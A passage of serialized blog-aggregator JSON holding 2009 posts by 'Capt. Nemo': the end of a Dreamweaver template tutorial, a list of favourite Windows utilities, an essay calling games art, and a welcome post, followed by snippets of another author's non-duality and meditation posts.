sidebar as well.
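For the curious, Dreamweaver marks editable regions with special HTML comments in the saved template. A minimal sketch of what the main region looks like in the markup (reconstructed from Dreamweaver’s standard template syntax, not copied from this tutorial’s files):\n\n\u003C!-- TemplateBeginEditable name=\"main\" -->\n\u003Cp>Sample blog entry goes here\u003C\u002Fp>\n\u003C!-- TemplateEndEditable -->\n\nEverything outside such comment pairs stays locked in pages created from the template.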
Now, Dreamweaver requires you to create a “site” before you can create a template. So go to the Site menu and click on New Site. Choose a site name (Artemis) and enter the correct web address where you can access index.html (http:\u002F\u002F127.0.0.1\u002Fartemis or http:\u002F\u002Flocalhost\u002Fartemis). Tell Dreamweaver that you want to use a server technology (PHP mySQL). Choose to edit and test locally (because we don’t yet have access to an external web server).\nOnce you’ve created a site, you can save the web template (Ctrl+S). Currently no templates exist in our website, so we will create one and call it “main template”. If Dreamweaver asks you to update links, press yes.\nNow we will create our basic home page using this template. Press Ctrl+N to create a new page. On the left choose “Page from Template”, choose the site as Artemis, and the template as well. Press Create, and voilà, we have our homepage. You may see that the heading, footer, and links are not changeable, because they’re not defined as “editable” in the template. However, the regions you chose to be editable are marked as such. Try writing some basic text in the sidebar and in the main content screen, and then save the file as index.php.\nNow open http:\u002F\u002F127.0.0.1\u002Fartemis\u002F on your computer, and be greeted with your newest creation. It is still, as of now, a static site, with links that don’t work and no dynamism, but we will make it better in the next part.\nIf you had trouble following this tutorial anywhere, feel free to post comments, or tweet me @captn3m0. I will be happy to reply. Further, if you feel that you missed something, here is my work for you to compare with:\n\u002F\u002F#todo add link to zip file here",[],{"slug":3249,"title":3250,"link":3251,"pubDate":3252,"contentSnippet":3253,"tags":3254,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"nautilus-behind-the-curtains","Nautilus : Behind The Curtains","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2009\u002F12\u002F04\u002Fnautilus-behind-the-curtains\u002F","2009-12-04T00:00:00.000Z","Almost everyone looks at my laptop’s screen, and asks me “is that Windows 7?”, and I reply to each of them with the same answer: “No”. I have not yet moved to 7, for various reasons which I am not going to explain over here, but let’s just say that I’m still clinging to dear old Vista. I don’t really have as much trouble with Vista as many people have said. I work blazingly fast with Vista, which is what it is all about. As an operating system, it is expected to help me get my job done, not do everything by itself. And this is where my software listing comes into view. Since everyone has those “how the heck did you do that?” moments when they look at me doing stuff, I decided to publish a listing of some of my favourite applications, so that I may redirect you to a safe spot where you may choose things as you like. This listing may not suit your way of working; however, you might find a gem or two along the way. This is not a listing of all the software that I use, rather just a collection of cool tools that I think every Windows user should be using. If you think you’ve found that killer app for doing things, do let me know in the comments. I’ll be listening.\nDell Dock : I just love this tool and its ability to divide the applications that I use into categories. It doesn’t take up much screen real estate, and takes me wherever I ask it to. With the ability to assign custom icons, and add separators\u002Fcategories etc., it is more than an average dock; it’s my favourite dock. On the downside, this is only for Dell computers, and comes preinstalled. However, you can download it from here if you didn’t get it with your Dell system. Non-Dell users may be interested in RK Launcher, a freeware dock that simulates the Mac Dashboard, and does a pretty good job. There was another version of Dell Dock (2.x), which has yet to be released on the website but was available to Dell Studio buyers, with new and better icons. Drop by a comment if you need it.\nWindows Sidebar : Another tool I find myself using frequently is the Windows Sidebar, with 3-4 gadgets that are absolutely essential to me, such as the NowPlaying, MultiMeter, and Top Processes gadgets. A key shortcut to remember here is Win+Space, which pops up my sidebar. Gadgets are a quick way to organize yourself, and keep a check on other things, like your schedule (Date Time), twitter (Twadged), quick-launching apps, and direct search, among other things. Most users underestimate their usage and restrict themselves to the Clock and Slideshow gadgets. Go ahead and search for them; see if you can find a gadget that matches what you’d like.\nQuick Launch : Not many would regard this as a tool; however, it gives one a productivity boost. Try putting your favourite tools in the Quick Launch, and see if that helps you a bit, between searching for that app in the Start Menu, or clicking it right where it’s clickable. Also try increasing the size of the Quick Launch, by unlocking the taskbar, then right-click -> View -> Large Icons.
That really looks cool!\n**Internet Download Manager:** My personal favourite download manager. Others that you may be interested in are Orbit and DownThemAll! (a Firefox extension). It helps me keep track of what I’m downloading right now, and the speed benefits are downright clear. I also like its ability to capture downloads from any application, so I don’t have to wait for those updates taking forever to download. It downloads using batch files and schedulers, and even turns off your computer when it’s done.\n**Everything:** I should have put this above all in the list. This is such a good tool, I cannot overstate its importance. What it basically does is search “Everything”. The tool does not index file contents\u002Fproperties, and only maintains an index of file names. As such it is blazingly fast, and searches all my applications\u002Fmusic\u002Ffiles damn quick. With an efficient shortcut (such as Win+S), you’re on your way to becoming a Windows power user. On the downside, once you start using this really frequently, you tend to get a little disorganized, putting stuff everywhere, knowing you will find it with Everything. Here’s a link to the website. (MUST USE)\n**Browsers:** I currently use a combination of Google Chrome\u002FFirefox as my primary browsers, updated to the latest dev build and the last stable beta respectively. Both of these are great, and I prefer Firefox with its huge base of available extensions. And if someone out there is still using IE, please switch immediately. Firefox is such a great way to browse with, and Chrome such an ease on the eyes. It’s hard for me to pick between the two; I’d rather wait and watch over the next year to see where each one stands. Safari and Opera come a distant second for me, with Safari being the better one.\n**File Tools:** I use 7-Zip for compression purposes, CCleaner to rid my computer of junk, Defraggler to defragment my hard disk, and Recuva from the same company to restore those accidentally deleted files. Another tool I would mention here is GoodSync, which I use to sync my USB drive and my Documents. I also use it to organize my Start Menu, using a Dock folder on my Desktop, which I sync to the Start Menu. Dropbox is the best tool I use for my syncing purposes between different computers. It offers 2 GB for starters, and all the sync is on the fly, meaning you just copy things to your Dropbox folder, which is automatically synced to all of your computers. It is also a great way to sync your projects with different people.\n**Multimedia:** I prefer Windows Media Player 11 for audio, and VLC for video viewing. With my NowPlaying gadget, and GTalk in sync with WMP, it’s easy to change tracks and let others know what you’re listening to. I also use Zune occasionally when I’m in the mood for a pure music experience. Pictures are pretty easy to manage with Windows’ built-in Photo Gallery, or its Live version. Also check out Picasa, Google’s free photo management tool.\n**Office Tools:** I am currently using a Technical Preview Beta of Office 2010 for documents and presentations, Notepad++ for text and code editing, and Foxit PDF Reader for ebooks and reading stuff, which is way faster and smaller than that bloated Adobe Acrobat Reader. I use Windows Live Writer, which offers a lot of plugins, to edit posts, including this one. Offline Gmail and Google Docs capability is way cooler than you think. Do try it out.\n**Anti Virus:** This is one of the areas where I am consulted the most. Which antivirus to use? 
Well, I would recommend Kaspersky if you’re ready to shell out some money and accept a little slowing down of your system, or use Microsoft Security Essentials, which I currently use. It is quick, doesn’t bog down my system, stops real-time protection when I want it to, excludes some of my dangerous folders from being scanned and nuked, updates itself, detects almost any virus I dare to throw at it, and looks neat. On the downside, it is just minimal, with no support for hosts file scanning, whitelisting, firewall, cookie management, or user control, among other “high level stuff” that other antiviruses offer. But I like it, have been consistently using it for the last 3 months, and am pretty sure I’m virus-free. It does have a catch: you must own a valid, genuine copy of Windows to use the tool.\n**Security Tools:** These are the nifty small programs that help me keep my computer safe and sound. This listing comprises tools I would suggest to the average user; I personally use a combination of more than just the following tools:\nAMPAWSmasherX: Stops viruses from using your pen drive as a medium, by blocking that autorun.inf file. You might not find the tool easily available for download, but if you do, it’s a pretty good one.\nSpyBot Search & Destroy: This is one-stop protection for all malware. Keep the definitions updated, however, and you will find that infections are pretty easy to deal with.\nHiJackThis: Must use every 2 weeks or so. Shows you anything that has been changed from the normal settings on your computer, and allows you to change it back to default. Use it carefully, as it is quite a powerful tool and may cause instability on your system later on; if you don’t know what to do, generate your report and post it online in one of the help forums.\nWinPatrol: This is also a must-use program for securing your computer against anything “unwanted”, which may include viruses, malware, additional crapware, fake Windows services, hidden files, and the like. This is basically a watchdog (Scotty) which keeps a watch on any new startup programs (my favourite), file extension changes, new services, and the like. If Scotty detects an unwanted change in your system, he barks, reminds you of the change, and asks you if you’d like to keep it. It also allows you to add\u002Fremove\u002Fdelay items in your startup programs list, and is my favourite program of the lot.\n**Other Tools:** I would just like to recommend some more everyday helpful tools to you, in no particular order. Try them out; you might like them or not, but they are definitely worth checking out: TeraCopy, AveThumbnail Resizer, TuneUp Utilities, VistaGlazz (a must-use for adding transparency to the title bar), appwiz.cpl, WinBubbles, Privoxy, Taskbar Shuffle, Paint.NET, DupFiles, WinDirStat, OverDisk (both for checking disk usage), PMenu (especially if you use portable programs on your USB drive, or for assigning Win+ hotkeys to programs, like I use Win+P=Paint, N=Notepad), and the Nero free version, among others. (Refer below for a complete listing.)\n\n**Looks:** Looks are a necessary part of making your computer shine out in the crowd, and I use the fewest programs required for that purpose. I use TuneUp’s Styler to change my login screen, and shuffle through my personal wallpaper collection using “Vortec Wallpaper Changer”, a utility I built. Using VistaGlazz to patch my theme files to support 3rd-party themes, I use themes downloaded from deviantArt. 
I also iconized my taskbar for efficient taskbar management, and changed the Quick Launch icon size to large (looks cool). QTTabBar is also a cool addition to Windows, bringing tabbed browsing to Windows Explorer. The current theme I use is “Cleaero”, and it gives me some cool transparency. I also use PowerMenu (another must-use) for adding transparency to, or changing the priority of, any window. I love it when my Firefox window is transparent and I’m browsing while watching a video in the background. That is downright as cool as it gets without using WindowBlinds. And choosing the coolest gadgets can make all the difference, so see if you can find the right ones!\nComplete Listing of Tools\nThe above was just a partial listing of the programs that I use. I generated file listings of all the software that I use, via four different methods. All of these are text files that you may use, with one exception. The easiest one is a tree map generated for my Dock folder (list.dock). I generated a listing of all exe files inside my Program Files (which may not be complete, since many apps like Chrome are installed in the user data folder); this one is named list.exe.txt. Next I generated a listing of all installed programs using HijackThis, called list.hijack. Another one was compiled using WinDirStat (list.windirstat). Using OverDisk I generated a virtual folder view of my Apps directory (this one’s huge at 2.x MB). Then I zipped them up and posted them here. Browse through them; you might find a lesser-known app here. Especially check out the “tiny” folder. It is literally legendary, with tons of stuff! And one more thing: use OverDisk to open the ovd file.\nDownload Here – Listings\nThis list was composed by Capt. Nemo as a recommendation for non-power users of Windows. You are free to check out any of the programs; most of them are freeware, if not open source, and do not pose a harm to your computer. However, if anything happens to your computer because of these tools, I am NOT responsible for your usage of them. I try to use open-source\u002Ffreeware tools as far as possible. If you use a commercial tool, do remember to pay the author, and stand against piracy. Otherwise use “Free as in Beer” tools like me! 
I recently came across an article by Jonathan Blow, my favourite game designer (Braid). He opened my mind to the fact that “a game is a form of art”.\nYou may not agree with this statement right now, but consider James Cameron’s Avatar, which looks so close to real, yet is live 3D. It does look kind of gamer-ish, doesn’t it? And we all agree that cinema and literature are a part of our culture, part of our art. But as movies get closer to games (Resident Evil, Prince Of Persia), the same is happening the other way around. Games are becoming a part of our art culture. Games like BioShock and Fear portray doomed versions of our future. The designers behind these games did not just say “let’s make another FPS where you kill everything that moves” (that was Doom 1 and 2, by the way). They decided to create a realistic storyline, and better gameplay. That is the kind of innovation it takes to convey the feel of the game to the player. Let us now quickly take up some of these categories I defined.\nGames You Must Play\nThese are the kind of games that each of us has played. They remind us of how we first stared at that green background trying to figure out the next play in Solitaire. Or the joy of ducking under the dragon and touching that axe in Mario. These games still remind us of the giant leap that the gaming industry has taken. From Dave, Wolf3D, and Road Rash, we have reached graphics quality that surpasses HD (Call Of Duty: Modern Warfare 2).\nGames You Play\nSkip this if you aren’t a gamer. If you’re one, well, you know the games I’m talking about. Nothing beats taking a frag with a Deagle. Other than maybe shouting 14 before all those AoE games. It’s the thrill, and excitement, and your love of the game that keeps you glued to the seat. I won’t call these games entirely unethical, because the gameplay here is fair enough, and exciting. You know what you’re doing, and why. And it’s not just because of that score, or frag. It is also because of the satisfaction that you get after that frag.\nGames You Wish You Could Play\nSometimes your graphics card isn’t all that powerful, or you just can’t find a torrent\u002Fdownload link for the game. Sometimes 10GB games do seem big. And sometimes, as in the case of FIESTA, the game hasn’t been launched for PC.\nGames You Should Play\nThese are the games that really matter. They form the core of my “games are art” theory. Games like Braid, Osmos, Minesweeper, Prince Of Persia (not all), Tomb Raider (again, not all parts). These games take you into their own world, where you get to learn, listen, think, and observe. Where you play the game because it’s exciting, and fun, and you want to play it. Not because someone is offering you a “level up” if you click on a button.\nGames You Should Never Play\nIf once is not enough, I repeat: stay away from these games. Please, these hacked-up versions of the same code, or sometimes the same game idea, do not deserve to be called games. Mafia Wars, Restaurant, Cafe Shop, and all of those mindless Facebook games come here. And so do World Of Warcraft, Travian, and NFS Pro Street (that was just a bad game). These so-called games:\ndo nothing to entertain you\noffer you nothing but just-another-level-up\nnever “teach” something (play Braid, you’ll understand what I mean)\nhave nothing interesting\nThen what is the reason that they are so hyped, and among the most played MMORPGs? The reason is a lack of better games. A lack of games that exist on Facebook and are not another clone of Mafia Wars. 
A lack of games that adhere to strict design ideas. Do not get me wrong. There are some serious game designers who are talented, but the truth is that they are forced to make what sells, and what sells is Mafia Wars. Unfortunately, these people are forced to work on such games, wasting their talent on mindless titles. And if all of this wasn’t enough, read this quote by the CEO of the company behind Mafia Wars:\nI knew that I wanted to control my destiny, so I knew I needed revenues, right, fucking, now. Like I needed revenues now. So I funded the company myself but I did every horrible thing in the book to, just to get revenues right away. I mean we gave our users poker chips if they downloaded this zwinky toolbar which was like, I don’t know, I downloaded it once and couldn’t get rid of it. (laughs) We did anything possible just to just get revenues so that we could grow and be a real business… So control your destiny. So that was a big lesson, controlling your business. So by the time we raised money we were profitable.\nRead the entire story on Facebook gaming scams here. And if you’re with me, try picking up some better titles instead of playing these nonsense games on FB.",[],{"slug":3263,"title":3264,"link":3265,"pubDate":3266,"contentSnippet":3267,"tags":3268,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"welcome","Welcome Aboard The Nautilus","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2009\u002F11\u002F19\u002Fwelcome\u002F","2009-11-19T00:00:00.000Z","This is my first real post on my brand new blog at WordPress, and quite seriously, I’m thrilled to get a new start. I hope this project flourishes, unlike many of the other things I took up (Kasiasi, Papercut, …). I have not yet completely given up on Papercut, and I really liked the Google Sites interface, but posting online and editing it takes time. So this is my first attempt at publishing offline-edited work, using Windows Live Writer. I’ll try other options as well, and let you know which I like best.\nNow for some blogging stuff. What’s happening aboard the Nautilus? What is the Nautilus, and who is Capt. Nemo? Let me answer these three questions in my introductory post first. It all began in Kota, when I was a JEE student vying to enter the holiest institutes of the country, the IITs. And what I was doing there was, well, studying and playing Age Of Empires with my two best friends, Sankalp (aka General Hendrix) and Shundi (aka Dr. Lecter). And our trio was one of the most feared AoE clans in Kota. We played together in perfect team play, and knew every counter there was to know, and every fact in the guidebook.\nThere was just one little flaw: I didn’t have a name. I used to play under various names, like Godfather, Eragon, and of course Harry Potter, but none of these stuck, and I was still nameless. I was like Maerad in The Gift, looking for her true name. That night I went sleepless, and searched my inner soul for my true name. Both of my teammates already had titles (one a doctor, the other a general), so I decided I would get one as well. And after storming my brain for all the books I’ve read, and all those movies, I settled for Capt. Nemo. Where did I get the name from? It was from a book called “20,000 Leagues Under the Sea”, by the immortal master of Sci-Fi, Jules Verne. The character of Capt. Nemo was one of the most mysterious you could ever see. And one of the most brilliant. And I got it when I’d read it for the umpteenth time: Capt. Nemo wasn’t an enigma. 
Just because he didn’t fit the definition of a hero doesn’t make him a villain. I could go on and on about the character, but that would take up space, which I’m determined to use to answer the other two questions.\nSo what is the Nautilus? I call pretty much everything I own the Nautilus. Why? Because that was Capt. Nemo’s masterpiece. His submarine, and the very first, at least on paper. My room and my laptop are labelled Nautilus. And this blog is the path that I follow “Aboard The Nautilus”. That brings me to the third question: what have I been doing lately?\nLately I’ve been playing around with PHP a lot, and mind you, it is really cool. I might post some of my experiences with PHP later on. And the reason I’ve been playing with PHP is that I’ve been working on my own website (it’s not exactly mine; it’s under the Web Designing Section, IITR, but I’ve written 95% of its code). It’ll be launching soon, under a limited beta, so keep watching. I’ve also been working on the second issue of Criitique, an e-magazine for the youth. With kick-ass articles, you are sure to like it. Do check it out at www.criitique.com. Playing Age Of Empires is now a daily affair for me, and I’ve been working my way up and down my timings. For those interested, my timings currently are “13,20,35 with 27,28-29 pop”. I’ve been tweeting a lot, and I still don’t know why the Twitter fad isn’t catching on in India. Twitter is fast, and easy, so why don’t people use it? Any ideas? Let me know.\nI’ve also got to study, with my end sems coming up, and this seems to be the time to do it. Got any more brainstorming ideas to work on? Wanna work with me? Join the fun Aboard The Nautilus.\nAs an update, Windows Live Writer refused to connect to my blog, and I finally used BlogDesk to publish my post. 
I also tried Qumana and wBlogger, and FYI, none of them work.",[],[3270,3271,3272,3273,3274,3275,3276,3277,3278,3279,3280,3281,3282,3283,3284,3285],{"username":16,"name":15,"photo":17},{"username":28,"name":27,"photo":29},{"username":39,"name":38,"photo":40},{"username":57,"name":56,"photo":58},{"username":69,"name":68,"photo":70},{"username":85,"name":84,"photo":77},{"username":95,"name":94,"photo":96},{"username":131,"name":130,"photo":132},{"username":151,"name":150,"photo":152},{"username":203,"name":202,"photo":204},{"username":214,"name":213,"photo":215},{"username":350,"name":349,"photo":351},{"username":411,"name":410,"photo":412},{"username":612,"name":611,"photo":613},{"username":983,"name":982,"photo":984},{"username":1640,"name":1639,"photo":77},{"id":3287,"title":3288,"body":3289,"description":3289,"extension":3290,"feedUrl":153,"lastFetched":3291,"maintainerName":150,"maintainerUsername":151,"meta":3292,"navigation":3293,"path":3294,"posts":3295,"seo":3356,"stem":3357,"__hash__":3358},"planet\u002Fplanet\u002Fpnudupa.json","Pnudupa",null,"json","2026-03-30T07:44:14.553Z",{},true,"\u002Fplanet\u002Fpnudupa",[3296,3300,3304,3308,3312,3316,3320,3324,3328,3332,3336,3340,3344,3348,3352],{"slug":142,"guid":3297,"title":143,"link":144,"pubDate":145,"content":3298,"contentSnippet":146,"tags":3299},"https:\u002F\u002Fwww.prashanthudupa.com\u002F?p=4996","When you just watch what&#8217;s going on with your seeing, hearing, smelling, tasting, touching, thoughting, feeling and your body-mind in general &#8212; it becomes very clear that you are not the things you see, the sounds you hear, the smells you smell, the tastes you taste, the objects you touch, or the body you have, [&#8230;]",[148,149],{"slug":166,"guid":3301,"title":167,"link":168,"pubDate":169,"content":3302,"contentSnippet":170,"tags":3303},"https:\u002F\u002Fwww.prashanthudupa.com\u002F?p=4983","When I started just looking at what’s going on, I first noticed the cyclic nature of all phenomena. Just about everything had a beginning, middle, and end. Whether it was breath, or heartbeat, or thought, or feeling, or a sound, or any other sensation for that matter. It seemed like life was just a stream [&#8230;]",[148,149],{"slug":255,"guid":3305,"title":256,"link":257,"pubDate":258,"content":3306,"contentSnippet":259,"tags":3307},"https:\u002F\u002Fwww.prashanthudupa.com\u002F?p=4977","As Turiya, what is the purpose of life? The purpose of a body-mind-personality system is easy to define in terms of goals, ambitions, aspirations and so on. But, as Turiya, what really is the purpose of life? The purpose of life is to make space for Karma to express and extinguish itself. The content of [&#8230;]",[148,149],{"slug":422,"guid":3309,"title":423,"link":424,"pubDate":425,"content":3310,"contentSnippet":426,"tags":3311},"https:\u002F\u002Fwww.prashanthudupa.com\u002F?p=4961","When I take a close look at anything, it seems to dissolve and eventually disappear. Behind everything, there is just emptiness. There is no solid stuff. It&#8217;s all empty. I understand that this can be a lot to take all at once. Let&#8217;s unpack it gently. What does &#8217;empty&#8217; mean? The word &#8220;empty&#8221; means exactly [&#8230;]",[148,149],{"slug":436,"guid":3313,"title":437,"link":438,"pubDate":439,"content":3314,"contentSnippet":440,"tags":3315},"https:\u002F\u002Fwww.prashanthudupa.com\u002F?p=4935","We live in the age of self-improvement. 
Therapy, trauma-healing, productivity hacks, and endless self-help advice promise to make us better, happier, more fulfilled versions of ourselves. But have you ever stopped to ask: who or what is actually being improved? Is there really a fixed “self” at the center of all these efforts, or is [&#8230;]",[148,149],{"slug":443,"guid":3317,"title":444,"link":445,"pubDate":446,"content":3318,"contentSnippet":447,"tags":3319},"https:\u002F\u002Fwww.prashanthudupa.com\u002F?p=4923","The 1999 blockbuster &#8220;The Matrix&#8221; unpacked so many complex philosophical ideas in a way that complete non-philosophers could comprehend and munch on them. I clearly notice a fundamental shift in my understanding of reality before and after The Matrix. When I watched it for the first time, I knew I got something, but couldn&#8217;t put [&#8230;]",[148,149,224],{"slug":466,"guid":3321,"title":467,"link":468,"pubDate":469,"content":3322,"contentSnippet":470,"tags":3323},"https:\u002F\u002Fwww.prashanthudupa.com\u002F?p=4861","Many spiritual traditions say that enlightenment reveals the world as an illusion and lets you see true reality. But what does that really mean? The Mandukya Upanishad describes four states of human experience: waking, dreaming, deep sleep, and a fourth called Turiya. The Four States The first three—waking, dreaming, and deep sleep—are familiar to us. [&#8230;]",[149],{"slug":473,"guid":3325,"title":474,"link":475,"pubDate":476,"content":3326,"contentSnippet":477,"tags":3327},"https:\u002F\u002Fwww.prashanthudupa.com\u002F?p=4835","Introduction Recently my older brother stumbled upon an AI documentation generator called DeepWiki, and shared full documentation of my Scrite project that he generated using it. DeepWiki can parse the source code of any project hosted on a public Git repository like GitHub and construct documentation explaining the architecture and implementation. Benefits of AI-Documentation Back [&#8230;]",[148,149],{"slug":480,"guid":3329,"title":481,"link":482,"pubDate":483,"content":3330,"contentSnippet":484,"tags":3331},"https:\u002F\u002Fwww.prashanthudupa.com\u002F?p=4831","On my morning walk in the park today, I had this very surreal knowing that I was reduced to a mere witness of this whole show. Yet, oddly, it did not feel like a reduction. It felt like the mind was dipping into &#8220;me&#8221; to construct both the world and the experiencer [&#8230;]",[148,486,149],{"slug":502,"guid":3333,"title":503,"link":504,"pubDate":505,"content":3334,"contentSnippet":506,"tags":3335},"https:\u002F\u002Fwww.prashanthudupa.com\u002F?p=4793","In our everyday experience, we often think of ourselves as a separate &#8220;Self&#8221; - a permanent entity that is distinct from everything else in the world, including other people and things. This sense of separation can lead to anxiety, fear, and other forms of suffering. Non-duality offers a radical shift in perspective. Instead of seeing ourselves as [&#8230;]",[148,149],{"slug":509,"guid":3337,"title":510,"link":511,"pubDate":512,"content":3338,"contentSnippet":513,"tags":3339},"https:\u002F\u002Fwww.prashanthudupa.com\u002F?p=4787","Memory is whatever the mind brings up. Hypothetically, the mind can create random images, thoughts, and bodily sensations that feel like memories. Even when the body-mind system is working perfectly, memory is always at the mercy of whatever it pulls up in the moment. 
It&#8217;s possible that the body-mind system isn&#8217;t buggy and it never [&#8230;]",[148,149],{"slug":516,"guid":3341,"title":517,"link":518,"pubDate":519,"content":3342,"contentSnippet":520,"tags":3343},"https:\u002F\u002Fwww.prashanthudupa.com\u002F?p=4748","The term māyā is often translated as &#8220;illusion&#8221;—a powerful force that makes the dualistic world appear real, even though only the non-dual Brahman truly exists. However, I prefer to interpret māyā not as &#8220;illusion&#8221; but as &#8220;disappearance&#8221; or &#8220;vanishing&#8221; (in its street-Kannada sense). In truth, all of reality is constantly vanishing into a void. This [&#8230;]",[148,149],{"slug":535,"guid":3345,"title":536,"link":537,"pubDate":538,"content":3346,"contentSnippet":539,"tags":3347},"https:\u002F\u002Fwww.prashanthudupa.com\u002F?p=4727","Awareness is always of what has already happened. I become aware of what I see only after the seeing has occurred. I become aware of what I hear only after the hearing has happened. I become aware of what I touch only after the touch has occurred. I become aware of what I taste only after the tasting [&#8230;]",[148,149],{"slug":757,"guid":3349,"title":758,"link":759,"pubDate":760,"content":3350,"contentSnippet":761,"tags":3351},"https:\u002F\u002Fwww.prashanthudupa.com\u002F?p=4621","When I look at an object, like the cup on the table next to my laptop right now, the visual feel of the object is entirely driven by the physical object itself. In this case, I am not imagining or making up the visual feel of the cup. It looks the way the cup intends [&#8230;]",[148,149],{"slug":868,"guid":3353,"title":869,"link":870,"pubDate":871,"content":3354,"contentSnippet":872,"tags":3355},"https:\u002F\u002Fwww.prashanthudupa.com\u002F?p=4564","I think the purpose of meditation matters a lot. If we are after enlightenment, then its pursuit becomes a craving in itself and that ends up being a hindrance. However, if our intention is to end suffering, then we have a far more practical goal and in fact letting go of craving becomes so much more [&#8230;]",[148],{},"planet\u002Fpnudupa","4xPJsHmHctvZ9PJQoCGPcNyzPE-wV8Vdz2tZDWWzxQM",1774934841012]